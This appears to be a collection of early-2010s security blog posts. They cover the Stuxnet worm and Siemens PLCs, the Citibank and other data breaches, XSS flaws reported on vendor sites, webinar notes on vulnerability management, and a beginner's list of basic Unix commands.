Let's start by dispelling one myth that seems to be growing up around this piece of PLC-controlling software: PLCs are not super-secret devices, but are standard bits of industrial control equipment that can cost as little as $200 (and, for really complicated ones, many thousands), and are available from industrial supply houses all over the world without any kind of security check. The software used to program PLCs is no more secret than the devices themselves. WinCC, the compromised program, may not be known to many programmers or sysadmins who work in offices, but it is a familiar tool for industrial plant people in many different fields. 

Siemens, based in Germany is one of the biggest of multinational big dogs in the PLC field. They sell into the U.S., China, Brazil, India, and almost anywhere else there's any industry at all. Want to count cereal boxes on an assembly line and measure out the right amount of cereal for each one? You can program a Siemens PLC for that application, no problem. Want to spin your Uranium-enrichment centrifuges at just the right speed? Ditto. Or run track-mounted speed detectors and switch gear for your high-speed rail system or the moisture control on your Yankee dryer? No problem. If there isn't a PLC app for that already, writing one is no big deal. 

An early article about the Stuxnet infection in Iran claimed that it infected "millions" of industrial control computers there. This is unlikely. Indeed, it's unlikely that Iran has millions of industrial control computers, period. And Stuxnet is not -- at least in forms discovered so far -- an Internet-spread problem, but one that typically infects a computer network when someone plugs a USB stick containing the worm into a computer on that network. 

Another article, on Forbes.com, postulated that the Stuxnet worm's purpose was to disable satellites run by the Indian Space Research Organization, which would mean more business and prestige for China's AsiaSat. 

And maybe some Siemens PLCs are not supposed to be going to Iran, after all. A New York Times story published on Sept. 29 said, "...last year officials in Dubai seized a large shipment of those controllers — known as the Simatic S-7 — after Western intelligence agencies warned that the shipment was bound for Iran and would likely be used in its nuclear program." 

That same story mentions the Biblical-sounding connection of one of the worm's file names to the Book of Esther, "a clear warning in a mounting technological and psychological battle as Israel and its allies try to breach Tehran’s most heavily guarded project." But it also says, "Others doubt the Israelis were involved and say the word could have been inserted as deliberate misinformation, to implicate Israel." 

And then there's that DEAD F007 "leetspeak" PLC output. Eric Loyd, President of Bitnetix, says that no matter how juvenile DEAD F007 sounds, "Stuxnet is far from a kid-hacker attack." Indeed, Loyd is one of many IT experts who believe Stuxnet may be the most sophisticated piece of malware ever written, with its use of four separate Windows zero-day attacks, not one but two genuine security certificates (now revoked), and its ability to not only monitor but modify instructions for the targeted Siemens PLCs. 

While PLCs may be a mystery to many -- even most -- programmers and sysadmins, they are not complicated, nor do they take advanced degrees to figure out. In most of the industrial world, they are the responsibility of guys who wear their names on their shirts. Indeed, the whole point of SCADA is that it makes plant processes easy to visualize and control. 

So far there is no concrete evidence that Stuxnet-infected computers or PLCs have affected Iran's nuclear fuel enrichment program or delayed the startup of the country's one nuclear reactor. But there are suspicious coincidences that make it seem like Stuxnet might have done something to Iran's nuclear efforts, depending on which of the contradictory reports coming out of Iran you want to believe. 

On one hand Iranian government sources say Stuxnet has not caused problems or delays to anything nuclear, and on the other they claim they have arrested "Nuclear Cyberspace Spies" and are "fully aware of the activities of 'enemies' spy services.'" 


Stuxnet may not be the biggest problem

Whether Stuxnet is the work of Chinese or Israeli government cyberwarriors or a computer science student's prank that got out of hand, there are cures for it, and Microsoft is closing the four Windows zero-day vulnerabilities that allow the worm to do its mischief and to propagate laterally within a government or corporate computer network. And with the right malware protection, a Stuxnet infection can be detected immediately, says Kurt Bertone, Vice President of Strategic Alliances for Fidelity Security Systems, who says his company's XPS cyber defense products have no trouble dealing with Stuxnet. 

Other virus detection and malware control companies also now have a handle on Stuxnet, including Siemens, which offers complete Stuxnet detection and removal instructions.

But the problem now, Bertone warns, is not so much Stuxnet but other pieces of malware that are out there but may not have been discovered. He and Eric Loyd both worry that there may be some "Son of Stuxnet" worm out there, spread manually, like Stuxnet, or by some other vector, that will one day cause dangerous problems at nuclear plants, oil refineries or chemical plants or.... 

...there are millions of critical points in our modern industrial infrastructure that use PLCs and other computer-based controls, some of which are carefully secured against malware infections -- and some of which are not secure at all but have not yet been attacked.

Hackers Nab Card Data From 200,000 Citi Customers


Citigroup Inc. has become the latest victim in a string of high-profile data thefts by hackers targeting some of the world's best-known companies.

The New York bank said Thursday that about 200,000 Citibank credit card customers in North America had their names, account numbers and email addresses stolen by hackers who broke into Citi's online account site.

The breach comes after data attacks in recent weeks have struck at companies including Internet search leader Google Inc., defense contractor Lockheed Martin Corp, and media and electronics company Sony Corp.

Citigroup said it discovered that account information for about 1 percent of its credit card customers had been viewed by hackers. Citi has more than 21 million credit card customers in North America, according to its 2010 annual report. The bank, which discovered the problem during routine monitoring, didn't say exactly how many accounts were breached. Citi said it was contacting those customers.

The bank said hackers weren't able to gain access to social security numbers, birth dates, card expiration dates or card security codes. That kind of information often leads to identity theft, where cyber criminals empty out bank accounts and apply for multiple credit cards. That can debilitate the finances and credit of victims. Citi customers could still be vulnerable to other problems. Details about their bank accounts and financial information linked to them could be acquired using the email information and account numbers hackers stole.

Federal regulators have taken notice and are asking banks to improve security.

"Both banks and regulators must remain vigilant," said Sheila Bair, chair of the Federal Deposit Insurance Corporation. She said federal agencies, including the FDIC, are developing new rules to push banks to enhance online account access.

The Citi incident is only the latest data breach at a major company.

  • On June 1, Google said that the personal Gmail accounts of several hundred people, including senior U.S. government officials, military personnel and political activists, had been breached.
  • On May 30, broadcaster PBS confirmed that hackers cracked the network's website and posted a phony story claiming dead rapper Tupac Shakur was alive in New Zealand.
  • On May 28, Lockheed Martin said it had detected a "significant and tenacious attack" against its computer networks. The company said it took swift and deliberate actions to protect the network and the systems remain secure.
  • In April, Sony's PlayStation Network was shut down after a massive security breach that affected more than 100 million online accounts.
  • Also in April, hackers penetrated a network operated by the data marketing firm Epsilon. The company handles email communications for companies like Best Buy Co. and Target Corp.

The number of data breaches in the last two months sets a "high water mark," said John Ottman, CEO of Application Security Inc., a New York-based firm that specializes in securing databases, the big repositories companies use to organize account information and other data.

"Attackers have realized that most organizations have not properly protected databases," Ottman said.

Cyber attackers have a variety of less-dangerous motivations, from mischief to online activism. For example, a group identifying itself as LulzSec claimed credit for the fake PBS article calling it retaliation for a documentary about WikiLeaks, the website that publishes classified documents.


Hackers Attacking Smaller Companies



Hackers are increasingly targeting small and medium-size businesses for cyber attacks, said experts speaking at the Connect Southern California Innovation Conference Thursday in San Diego.

The event featured two panels on cyber security – one geared toward security regulations facing corporate information technology departments and a second focused on what companies can do to protect themselves from cyber attacks.



Friday, May 11, 2012

UNC Charlotte: 350,000 SSNs Exposed in Decade-long Data Breach

Two issues exposed financial data and Social Security numbers for 350,000 people, although it is thought the information has not been abused, the University of North Carolina at Charlotte said.

It blamed a system misconfiguration and incorrect access settings for the exposures, which also involved names and addresses of people who had done transactions with the university. The university said in a statement earlier this week that it has fixed both problems, one of which lasted three months and the other more than a decade.




Thursday, May 10, 2012

FBI Warns Travelers Using Hotel Networks About New Attack



The FBI is warning travelers to be wary of attempts to infect their computers when they log on to hotel networks. In an intelligence note from the FBI’s Internet Crime Complaint Center (IC3), the agency says that attackers have been targeting travelers abroad when they use the Internet connection in their hotel rooms. According to the FBI, when the victims attempted to set up the hotel room Internet connection, they were presented with a pop-up window notifying them to update a "widely used software product."



Wednesday, May 9, 2012

I'm Sure Everything You Do Online Is Safe


...sorry I held my laughter as long as I could. Now let's think about this for a minute. These small yet profitable companies probably have a few more dollars than you for online security and yet they are victims, hmmm...!  ...Butch


F-Secure, McAfee and Symantec websites again XSSed

Written by DP
Friday, 13 January 2012

Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and appear to be working still. They can be triggered on...

Not surprisingly, McAfee websites are susceptible to XSS attacks

Written by DP & KF
Wednesday, 30 March 2011
Famous antivirus vendor McAfee has been all over the news the past few days, regarding cross-site scripting and information disclosure vulnerabilities that affected several of its websites. It all started when...

Secure Amazon Seller Central password reset page XSSed

Written by DP
Wednesday, 13 October 2010

Just another critical cross-site scripting vulnerability has been reported by "See Me" for Amazon Seller Central, a secure website where sellers who signed up for the "Checkout by Amazon" service can view and manage their orders...

EV SSL-secured live PayPal site vulnerable to XSS

Written by DP
Wednesday, 6 October 2010
"d3v1l" from Security-Sh3ll has reported another critical XSS flaw affecting the live PayPal site, where "real money" changes hands... This XSS vulnerability once more undermines the security of Extended Validation SSL (EV SSL) digital certificates...

Persistent XSS bug discovered on eBay

Written by DP
Wednesday, 6 October 2010
Security researcher "Side3ffects" has contacted us regarding a critical persistent XSS that he discovered on eBay... One of the possible exploitation scenarios is malicious people stealing cleartext credentials from registered users by injecting an iframe tag that retrieves another rogue eBay login page from a remote server... 



Shifting Sands in Vulnerability Management: the new Strategic Security Platform



Shifting Sands in Vulnerability Management: The New Strategic Security Platform

Just finished a Rapid 7 , excellent.



Topics Covered:

www.nexus.securosis

Platform:

1. Data Model/Engine
2. Analytics
3. Visualization and Reporting

Core Technologies:

1. Discovery
2. Scanning Networks and Devices
3. Assess Databases & Applications
4. Configuration Assessment
5. Asset Management/Risk Scoring
6. Cloud Computing Impact?
7. SaaS or On-Premise Deployment?

Value Add Tech:

1. Attack Path Analysis
2. Penetration Testing
3. Compliance Automation
4. Patch/Configuration Management
5. Benchmarking Exfiltration Analysis


$60 Billion spent in Cyber Security since 2011.
90% of the companies have been hacked since 2005.

Monday, May 7, 2012

Unix Commands

Standard Commands

  1. Displaying the Date and Time: The date command
  2. Finding Out Who's Logged In: The who command
  3. Echoing Characters: The echo command - echo args
  4. List Information About Active Processes: The ps Command
  5. Display Current Working Directory Path: The pwd Command
  6. Sort Lines of file(s) or standard input if not supplied. - sort file(s)
  7. Count the Number of Lines Words and Characters in Files(s) or Standard Input if not Supplied - wc file(s)
  8. Returns Your Username: The whoami Command
  9. Lets you Change Your Password: The passwd Command
  10. Shows the Disk Usage of the Files and Directories in Filename - du filename
  11. Find Files Anywhere on the System - find / -name filename
  12. Looks for the String in the Files -  grep string filename(s) 
  13. Kills (ends) the Processes With the ID you Gave -  kill PID 
  14. Lists Your Last Logins -  last yourusername
  15. Tells you who's logged in, and what they're doing - w  
  16. Gives you lots of information about that user, e.g. when they last read their mail and whether they're logged in -  finger username
  17. Lets You Have a (typed) Conversation with Another User -  talk username
  18. Lets You Exchange One-line Messages with Another User - write username
  19. Lets you Send E-mail Messages to People Around the World. It's not the only mailer you can use, but the one we recommend - elm

Working With Files

  1. Listing Files: The ls Command - ls files
  2. Displaying the Contents of a File:The cat Command - cat file(s)
  3. Counting the Number of Words in a File: The wc Command
  4. Making a Copy of a File: The cp Command - cp file1 file2
  5. Renaming a File: The mv Command - mv file1 file2
  6. Removing a File: The rm Command - rm file(s)
  7. Links two Files Together - ln file1 file2
  8. Compares Files, and Shows Where They Differ - diff filename1 filename2
  9. Lets you Change the Read, Write, and Execute Permissions on Your Files -  chmod options filename 

Working With Directories

  1. Displaying Your Working Directory: The pwd Command
  2. Changing Directories: The cd Command - cd dir
  3. Creating a Directory: The mkdir Command - mkdir dir(s)
  4. Linking Files Into Directories: The ln Command - ln file(s) dir
  5. Copying a File from One Directory to Another: - cp file(s) dir
  6. Moving Files between Directories: The mv Command - mv file(s) dir
  7. Removing a Directory: The rmdir Command - rmdir dir(s)
  8. List Files in Directories or in Current Directory if Directories is not Specified. - ls dir(s)

Connecting to the Outside World:

  1. Allows you to Read News - nn
  2. Lets you Connect to a Remote Host - rlogin hostname
  3. Also Lets you Connect to a Remote Host - telnet hostname
  4. Lets you Download Files From a Remote Host Which is Set up as an Ftp-Server - ftp hostname
  5. Lets you Browse the Web From an Ordinary Terminal - lynx

File Compression:


  1. Compresses Files, so That They Take up Much Less Space - gzip filename
  2. Uncompresses Files Compressed by gzip - gunzip filename
  3. Lets you Look at a gzipped File Without Actually Having to gunzip it (same as gunzip -c) - gzcat filename
  4. You can even print it directly, using  - gzcat filename | lpr